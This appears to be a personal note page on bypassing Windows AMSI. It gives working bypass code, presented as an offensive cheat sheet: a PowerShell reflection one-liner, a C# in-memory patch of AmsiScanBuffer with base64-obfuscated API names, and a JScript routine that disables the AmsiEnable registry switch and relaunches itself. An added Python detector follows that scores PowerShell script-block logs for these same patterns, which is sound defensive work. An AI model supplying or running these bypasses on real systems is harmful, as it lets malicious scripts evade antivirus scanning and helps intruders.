Malware Note
Bypassing AMSI

PowerShell:

$a=[Ref].Assembly.GetTypes();Foreach($b in $a) {if ($b.Name -like "*iUtils") {$c=$b}};$d=$c.GetFields('NonPublic,Static');Foreach($e in $d) {if ($e.Name -like "*Context") {$f=$e}};$g=$f.GetValue($null);[IntPtr]$ptr=$g;[Int32[]]$buf = @(0);[System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $ptr, 1)

C#:

// Requires System, System.Text and System.Runtime.InteropServices (the original omitted the usings).
using System;
using System.Runtime.InteropServices;
using System.Text;

public class Amsi
{
    public static void Bypass()
    {
        string x64 = "uFcA";
        x64 = x64 + "B4DD";
        string x86 = "uFcAB4";
        x86 = x86 + "DCGAA=";
        if (is64Bit())
            PatchA(Convert.FromBase64String(x64));
        else
            PatchA(Convert.FromBase64String(x86));
    }

    private static void PatchA(byte[] patch)
    {
        try
        {
            string liba = Encoding.Default.GetString(Convert.FromBase64String("YW1zaS5kbGw="));
            var lib = Win32.LoadLibraryA(ref liba); // amsi.dll
            string addra = Encoding.Default.GetString(Convert.FromBase64String("QW1zaVNjYW5CdWZmZXI="));
            var addr = Win32.GetProcAddress(lib, ref addra); // AmsiScanBuffer
            uint oldProtect;
            Win32.VirtualAllocEx(addr, (UIntPtr)patch.Length, 0x40, out oldProtect);
            Marshal.Copy(patch, 0, addr, patch.Length);
        }
        catch (Exception e)
        {
            Console.WriteLine(" [x] {0}", e.Message);
            Console.WriteLine(" [x] {0}", e.InnerException);
        }
    }

    private static bool is64Bit()
    {
        bool is64Bit = true;
        if (IntPtr.Size == 4)
            is64Bit = false;
        return is64Bit;
    }
}

class Win32
{
    // Named VirtualAllocEx here, but the base64 string resolves it to VirtualProtect.
    public static readonly DelegateVirtualProtect VirtualAllocEx = LoadApi<DelegateVirtualProtect>("kernel32", Encoding.Default.GetString(Convert.FromBase64String("VmlydHVhbFByb3RlY3Q="))); // VirtualProtect
    public delegate int DelegateVirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);

    #region CreateAPI
    [DllImport("kernel32", SetLastError = true)]
    public static extern IntPtr LoadLibraryA([MarshalAs(UnmanagedType.VBByRefStr)] ref string Name);
    [DllImport("kernel32", CharSet = CharSet.Ansi, SetLastError = true, ExactSpelling = true)]
    public static extern IntPtr GetProcAddress(IntPtr hProcess, [MarshalAs(UnmanagedType.VBByRefStr)] ref string Name);
    public static CreateApi LoadApi<CreateApi>(string name, string method)
    {
        return (CreateApi)(object)Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref name), ref method), typeof(CreateApi));
    }
    #endregion
}

JS (Windows Script Host):

var sh=new ActiveXObject('WScript.Shell');
// Per-user switch read by the Windows Script Host before it calls AMSI.
var key="HKCU\\Software\\Microsoft\\Windows Script\\Settings\\AmsiEnable";
try{
    var AmsiEnable=sh.RegRead(key);
    if(AmsiEnable!=0) {
        throw new Error(1,'');
    }
} catch(e) {
    sh.RegWrite(key,0,"REG_DWORD");
    // Re-run this script with the JScript engine CLSID; the original lacked the space before the path.
    sh.Run("cscript -e:{F414C262-6AC0-11CF-B6D1-00AA00BBBB58} \""+WScript.ScriptFullName+"\"",0,1);
    sh.RegWrite(key,1,"REG_DWORD");
    WScript.Quit(1);
}
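Added example (not code from the notes above): detection logic, in Python, that scores PowerShell script-block log text (the message body of Event ID 4104) for the three tampering patterns shown on this page. The sample lines are constructed, trimmed copies of the snippets above plus two benign lines; the indicator weights and the alert threshold are assumptions chosen so that one generic token alone does not alert. The point it demonstrates is that the reflection one-liner avoids the literal type name (it matches `*iUtils`), and the C# variant keeps its API names base64-encoded, so the detector decodes base64 literals before matching.

```python
"""Score PowerShell script-block text for the AMSI tampering patterns on this page.
All sample lines, weights and the threshold below are constructed assumptions."""
import base64
import binascii
import re
from dataclasses import dataclass

# (name, pattern, weight). Weights are assumptions: a single generic token stays
# below ALERT_THRESHOLD; the combinations used by the page's snippets exceed it.
INDICATORS = [
    # PowerShell: wildcard match that avoids writing the literal type name "AmsiUtils"
    ("amsiutils_wildcard", re.compile(r"""-like\s+["']\*iUtils["']""", re.I), 3),
    ("amsiutils_literal", re.compile(r"AmsiUtils", re.I), 2),
    # PowerShell: reaching the private amsiContext field through reflection
    ("amsi_context", re.compile(r"""amsiContext|-like\s+["']\*Context["']""", re.I), 2),
    ("nonpublic_static", re.compile(r"""GetFields?\(\s*['"]NonPublic,\s*Static['"]""", re.I), 1),
    ("marshal_copy", re.compile(r"Marshal\]?(?:::|\.)Copy\(", re.I), 1),
    # C#: in-memory patch of AmsiScanBuffer (names appear base64-encoded in the sample)
    ("amsiscanbuffer", re.compile(r"AmsiScanBuffer", re.I), 2),
    ("amsi_dll", re.compile(r"amsi\.dll", re.I), 1),
    ("virtualprotect", re.compile(r"VirtualProtect", re.I), 1),
    # JScript/WSH: flipping the per-user AmsiEnable switch
    ("wsh_amsienable_key", re.compile(r"Windows Script\\+Settings\\+AmsiEnable", re.I), 3),
    ("wsh_regwrite", re.compile(r"\.RegWrite\(", re.I), 1),
]
ALERT_THRESHOLD = 4  # assumption

# A run of base64 alphabet characters with optional padding, not glued to other alphabet chars.
B64_TOKEN = re.compile(r"(?<![A-Za-z0-9+/])[A-Za-z0-9+/]{8,}={0,2}(?![A-Za-z0-9+/=])")


def decode_base64_literals(text: str) -> list[str]:
    """Return every base64 literal in text that decodes to printable ASCII, so the
    plain-text indicators can match names a dropper kept encoded."""
    found = []
    for match in B64_TOKEN.finditer(text):
        token = match.group(0)
        if len(token) % 4:
            continue  # not whole base64 quanta, so not an encoded literal
        try:
            decoded = base64.b64decode(token, validate=True).decode("ascii")
        except (binascii.Error, UnicodeDecodeError):
            continue  # ordinary identifiers rarely decode to clean ASCII
        if len(decoded) >= 4 and decoded.isprintable():
            found.append(decoded)
    return found


@dataclass(frozen=True)
class Verdict:
    score: int
    hits: tuple[str, ...]
    decoded: tuple[str, ...]

    @property
    def alert(self) -> bool:
        return self.score >= ALERT_THRESHOLD


def scan_script_block(text: str) -> Verdict:
    """Score one script block; each indicator counts once, whether it matched the
    raw text or one of the decoded base64 literals."""
    decoded = decode_base64_literals(text)
    views = [text, *decoded]
    hits, score = [], 0
    for name, pattern, weight in INDICATORS:
        if any(pattern.search(view) for view in views):
            hits.append(name)
            score += weight
    return Verdict(score, tuple(hits), tuple(decoded))


# Constructed samples: trimmed copies of the page's three snippets and two benign lines.
SAMPLES = {
    "ps_reflection": (
        '$a=[Ref].Assembly.GetTypes();Foreach($b in $a) {if ($b.Name -like "*iUtils") {$c=$b}};'
        "$d=$c.GetFields('NonPublic,Static');Foreach($e in $d) {if ($e.Name -like \"*Context\") {$f=$e}};"
        "$g=$f.GetValue($null);[IntPtr]$ptr=$g;[Int32[]]$buf = @(0);"
        "[System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $ptr, 1)"
    ),
    "csharp_patch": (
        'string liba = Encoding.Default.GetString(Convert.FromBase64String("YW1zaS5kbGw="));'
        'string addra = Encoding.Default.GetString(Convert.FromBase64String("QW1zaVNjYW5CdWZmZXI="));'
        'LoadApi<DelegateVirtualProtect>("kernel32", Encoding.Default.GetString('
        'Convert.FromBase64String("VmlydHVhbFByb3RlY3Q=")));'
        "Marshal.Copy(patch, 0, addr, patch.Length);"
    ),
    "wsh_registry": (
        r'var key="HKCU\\Software\\Microsoft\\Windows Script\\Settings\\AmsiEnable";'
        'sh.RegWrite(key,0,"REG_DWORD");'
    ),
    # An audit script that only reads the switch should stay below the threshold.
    "benign_audit": (
        r'var v=sh.RegRead("HKCU\\Software\\Microsoft\\Windows Script\\Settings\\AmsiEnable");'
        "WScript.Echo(v);"
    ),
    "benign_module_list": 'Get-Command -Module Microsoft.PowerShell.Utility | Where-Object Name -like "*Utils"',
}


def scan_samples(samples=SAMPLES) -> dict[str, Verdict]:
    return {name: scan_script_block(text) for name, text in samples.items()}


if __name__ == "__main__":
    for name, verdict in scan_samples().items():
        flag = "ALERT" if verdict.alert else "ok   "
        print(f"{flag} {name:<20} score={verdict.score} hits={','.join(verdict.hits) or '-'}")
```

Run over the samples, the reflection one-liner alerts on the wildcard, field-name and Marshal::Copy combination, the C# slice alerts only because the decoded literals expose amsi.dll, AmsiScanBuffer and VirtualProtect, and the WSH snippet reaches the threshold through the key path plus the RegWrite call, while a script that merely reads AmsiEnable stays below it. In production the input would be the ScriptBlockText field of 4104 events rather than constructed strings.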

Last updated 3 years ago
